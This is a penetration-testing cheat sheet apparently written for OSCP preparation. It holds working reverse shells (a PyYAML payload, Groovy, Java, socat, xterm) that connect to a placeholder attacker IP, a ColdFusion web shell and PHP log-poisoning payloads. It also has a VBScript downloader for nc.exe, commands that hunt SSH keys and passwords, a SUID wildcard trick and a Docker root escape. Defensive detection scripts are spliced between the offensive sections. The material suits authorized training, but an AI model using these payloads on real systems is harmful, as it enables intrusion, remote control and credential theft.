redteam-notebook

Collection of commands, tips, tricks and references I found useful while preparing for the OSCP exam.

Early Enumeration - generic

Network wide scan - first steps

nmap -sn 10.11.1.0/24

netbios scan

nbtscan -r 10.11.1.0/24

DNS recon

dnsrecon -r 10.11.1.0/24 -n <DNS IP>

Scan specific target with nmap

nmap -sV -sT -p- <target IP>

Guess OS using xprobe2

xprobe2 <target IP>

Check Netbios vulns

nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 <target IP>

Search for SMB vulns

nmap -p139,445 <target IP> --script smb-vuln*

Enumerate using SMB (null session)

enum4linux -a <target IP>

Enumerate using SMB (w/user & pass)

enum4linux -a -u <user> -p <passwd> <targetIP>

Website Enumeration

quick enumeration using wordlist

gobuster -u http://<target IP> -w /usr/share/dirb/wordlists/big.txt

enumeration and basic vuln scan of a website

nikto -host http://<target IP>

Website tips and tricks

Python (PyYAML unsafe yaml.load deserialization)

!!python/object/apply:os.system ["bash -i >& /dev/tcp/yourIP/4444 0>&1"]

PHP

Add /etc/passwd%00 to any GET/POST argument. On Windows try C:\Windows\System32\drivers\etc\hosts%00 or C:\autoexec.bat%00. A quick win could also be any of c:\sysprep.inf, c:\sysprep\sysprep.xml or c:\unattend.xml, as they may contain local admin credentials. On Linux it is worth checking /proc/self/environ to see whether any credentials were passed to the running process via environment variables.

/index.php?somevar=php://filter/read=convert.base64-encode/resource=<file path>%00 returns the PHP file base64-encoded instead of executing it. Good for fishing out config.php or similar.

With netcat, send a request like this:

GET /<?php system($_GET["cmd"]);?>
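The request patterns in this section (null-byte LFI, php://filter wrappers, /proc/self/environ and the sysprep/unattend files, plus a PHP tag sent in the request line for log poisoning) all leave a recognisable trace in the web server's access log. The following is an added example, not part of the original notes: a small POSIX sh filter that flags such requests and lists the source addresses behind them. The log lines are constructed for the demo and use RFC 5737 documentation addresses; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): flag access-log lines that carry
# the LFI / wrapper / log-poisoning markers discussed above.
# The sample log below is constructed for this demo.
SAMPLE_LOG='203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1234 "-" "curl/7.68.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?somevar=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 5678 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /products?id=42 HTTP/1.1" 200 910 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:12 +0000] "GET /<?php system($_GET["cmd"]);?> HTTP/1.1" 404 208 "-" "-"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /index.php?page=/proc/self/environ HTTP/1.1" 200 77 "-" "curl/7.68.0"
192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /about.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"'

# Print every log line whose request matches a known marker. Reads the log on
# stdin, so live use is: flag_lfi_requests < /var/log/apache2/access.log
# "|| true" keeps the exit status 0 when nothing matches (friendly to set -e).
flag_lfi_requests() {
    grep -E -i \
        -e '%00' \
        -e 'php://' \
        -e '(\.\./|%2e%2e%2f|%2e%2e/)' \
        -e '/etc/passwd' \
        -e '/proc/self/environ' \
        -e '(sysprep|unattend)' \
        -e '<\?php' \
        -e 'system\(' \
        || true
}

# Unique source addresses of the flagged requests (first field of the log line).
flag_lfi_sources() {
    flag_lfi_requests | awk '{ print $1 }' | sort -u
}

# Number of flagged lines in the constructed sample, used as a self-check.
count_flagged() {
    printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests | wc -l | tr -d ' '
}

# Stand-alone run: show the offending lines and who sent them.
printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
printf '%s\n' "$SAMPLE_LOG" | flag_lfi_sources
```

The patterns are deliberately broad (a benign URL containing "system(" will also be flagged); the point is to surface candidates for review, after which the matched paths can be compared against the files the application is actually meant to include.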

ColdFusion

Debugging & Logging -> Scheduled Tasks -> URL=<path to our executable>, Publish - save output to file (some writable path). Then run this task manually; it will download and save our file.

To execute it, create a probe: Debugging & Logging -> System probes -> URL=<some URL>, Probe fail - fail if probe does not contain "blahblah", Execute program <path to our downloaded exe>. Then run the probe manually.

<html>
<body>
<cfexecute name = "#URL.runme#" arguments = "#URL.args#" timeout = "20">
</cfexecute>
</body>
</html>

Dump the JVM system properties and environment:

<cfset runtime = createObject("java", "java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">

dir busting

Reverse Shell Howto

Groovy one-liner (java.io and java.net are imported by default in Groovy scripts):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/yourIP/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Java-style variant (adjust host, port and cmd):

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
}
p.destroy();
s.close();

xterm -display yourIP:1

On your side, authorize the connection with xhost +<target IP> and catch it with Xnest :1.

Listener: socat file:`tty`,raw,echo=0 yourIP:4444

Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:yourIP:4444

Interactive Shell Upgrade Tricks

Then Ctrl-Z back to the local shell and run stty raw -echo, return to the remote shell with fg and set the terminal with export TERM=xterm.

sh.exp

#!/usr/bin/expect
spawn sh
interact

Inside Windows

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Download a file with VBScript:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://yourIp/nc.exe", False
xHttp.Send

with bStrm
    .type = 1 ' binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 ' overwrite
end with

Inside Linux

System info
uname -a

Arch
uname -m

Kernel
cat /proc/version

Distro
cat /etc/*-release or cat /etc/issue

Filesystem
df -a

Users
cat /etc/passwd

Groups
cat /etc/group

Super accounts
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

Currently logged in
finger, w, who -a, pinky, users

Last logged users
last, lastlog

Cheeky test -
sudo -l

Anything interesting we can run as sudo?
sudo -l 2>/dev/null | grep -wE 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null

History -
history

Env vars
env

Available shells
cat /etc/shells

SUID files
find / -perm -4000 -type f 2>/dev/null

SUID owned by root
find / -uid 0 -perm -4000 -type f 2>/dev/null

GUID files
find / -perm -2000 -type f 2>/dev/null

World writable
find / -perm -2 -type f 2>/dev/null

World writable (excluding /proc)
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

World writable dirs
find / -perm -2 -type d 2>/dev/null

rhost files
find /home -name "*.rhosts" -print 2>/dev/null

Plan files
find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} \; 2>/dev/null

hosts.equiv
find /etc -iname hosts.equiv -exec ls -la {} \; -exec cat {} \; 2>/dev/null

Can we peek at /root?
ls -ahlR /root/

Find ssh files
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la

Inetd
ls -la /usr/sbin/in.*

Grep logs for loot
grep -l -i pass /var/log/*.log 2>/dev/null

What do we have in logs
find /var/log -type f -exec ls -la {} \; 2>/dev/null

Find conf files in /etc
find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null

as above
ls -la /etc/*.conf

List open files
lsof -i -n

Can we read root mail?
head /var/mail/root

What is running as root?
ps aux | grep root

Lookup paths to running files
ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'

Exports and permissions of NFS
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

List sched jobs
ls -la /etc/cron*

List open connections (run with sudo/as root for more results)
lsof -i

Installed packages
dpkg -l (Debian), rpm -qa (RH)

sudo version?
sudo -V

Available compilers
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null

If you find a privileged script that iterates over the files in a folder using a wildcard, and you can create files in that folder, note that the file names are expanded into the argument list of whatever command the loop runs. This opens up an interesting attack vector, e.g. when a for loop runs cp on each file: a file created with touch -- '--someargument' is passed to the command as --someargument. A good example is a script that copies files somewhere. Adding a file named --preserve=mode, copying /bin/bash into the same folder and changing its mode to 4755 results in the script copying bash as root with the SUID bit kept. Executing that copy with bash -p results in bash running as root.
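The root cause above is a script that lets the shell's wildcard expansion feed unanchored names to a command. The following is an added example, not part of the original notes: the unsafe pattern beside two forms that are immune to option-looking file names, with a probe that builds a scratch directory containing a file named --preserve=mode and reports whether each copy function treats it as data. All paths are temporary directories created by the probe itself; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): the wildcard-argument hazard
# described above beside two safe ways to iterate a directory.

# UNSAFE: a bare * run inside the directory hands any name that starts with "-"
# to cp as an option instead of a file operand (the pattern the note describes).
unsafe_copy_all() {
    ( cd "$1" && cp * "$2"/ ) 2>/dev/null || true
}

# SAFE: "--" ends option parsing, and the "$1"/ prefix guarantees no expanded
# name can begin with "-", so cp sees every entry as an operand.
safe_copy_all() {
    cp -- "$1"/* "$2"/
}

# SAFE alternative when each file must be processed individually: let find supply
# full paths to the command instead of relying on shell globbing.
safe_copy_find() {
    find "$1" -maxdepth 1 -type f -exec cp -- {} "$2"/ \;
}

# Run one copy function ($1) against a scratch directory that contains a
# hostile-looking file name and report "copied" if that file arrived in the
# destination as data, or "swallowed" if it was consumed as an option.
probe_copy_fn() {
    work=$(mktemp -d)
    mkdir "$work/src" "$work/dest"
    printf 'data\n' > "$work/src/normal.txt"
    printf 'data\n' > "$work/src/--preserve=mode"
    "$1" "$work/src" "$work/dest"
    if [ -f "$work/dest/--preserve=mode" ]; then r=copied; else r=swallowed; fi
    rm -rf "$work"
    echo "$r"
}

# Stand-alone run: compare the three patterns.
for fn in unsafe_copy_all safe_copy_all safe_copy_find; do
    printf '%s: %s\n' "$fn" "$(probe_copy_fn "$fn")"
done
```

--preserve=mode is used here precisely because it is harmless on its own: the probe shows the argument being swallowed without changing anything else. When reviewing cron jobs or backup scripts that run as root, any loop of the form `for f in *` or `cp * dest` over a directory writable by a less privileged user is the thing to look for, and the fix is the `--` plus path-prefix form or a find -exec.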

Docker tips

Since Docker most likely runs as root, if you can execute docker commands as an unprivileged user you can very likely use Docker's privileges instead.

docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash - note that the root folder of the host is mounted as /host. You'll also see all processes running on the host and be attached to the same NICs.

You may also want to look into escaping UTS and IPC namespacing with --uts=host --ipc=host.
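Because access to the daemon is root-equivalent, the two things worth auditing on a host are who is in the docker group and how the daemon socket is protected. The following is an added example, not part of the original notes: a POSIX sh check that lists docker group members from /etc/group-format input and classifies the permission bits of a socket path. The group-file text is constructed for the demo, a temporary regular file stands in for /var/run/docker.sock in the self-check, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): report who can drive the Docker
# daemon, since docker group membership or a loosely permissioned socket is
# root-equivalent on the host. The /etc/group text below is constructed.
SAMPLE_GROUP='root:x:0:
docker:x:998:alice,bob
sudo:x:27:alice
users:x:100:'

# Print the members of the docker group, one per line. Reads /etc/group-format
# text on stdin, so live use is: docker_group_members < /etc/group
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print m[i]
    }'
}

# Classify the permission bits of the socket path given as $1.
# Prints "world-writable", "group-writable", "restricted" or "missing".
# Parses ls -l rather than stat so it behaves the same on GNU and BSD userlands.
docker_socket_exposure() {
    sock="$1"
    [ -e "$sock" ] || { echo missing; return; }
    mode=$(ls -ld "$sock" | cut -c1-10)
    case "$mode" in
        ????????w?) echo world-writable ;;
        ?????w????) echo group-writable ;;
        *)          echo restricted ;;
    esac
}

# Self-check on the constructed group data plus a scratch file standing in for
# the socket, deliberately chmod 0666 to exercise the worst case.
demo_docker_exposure() {
    members=$(printf '%s\n' "$SAMPLE_GROUP" | docker_group_members | tr '\n' ' ')
    f=$(mktemp)
    chmod 0666 "$f"
    exposure=$(docker_socket_exposure "$f")
    rm -f "$f"
    echo "docker group: ${members}socket: $exposure"
}

# Stand-alone run against the constructed data, then against the live host.
demo_docker_exposure
printf 'live docker group: %s\n' "$(docker_group_members < /etc/group | tr '\n' ' ')"
printf 'live socket: %s\n' "$(docker_socket_exposure /var/run/docker.sock)"
```

A group-writable socket with a small, reviewed docker group is the normal state on a container host; every member listed should be treated as an administrator account, and a world-writable socket or a TCP-exposed daemon is a finding in its own right.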

Upload files using cUrl with WebDAV

curl -T nc.exe http://targetIP/nc.txt
curl -X MOVE -v -H "Destination:http://targetIP/nc.exe" http://targetIP/nc.txt

msfvenom

List payloads

msfvenom -l

Binaries

Web Payloads

Scripting Payloads

Shellcode

For all shellcode see msfvenom --help-formats for the valid parameters. Msfvenom will output code that can be cut and pasted into that language for your exploits.

Shellshock

References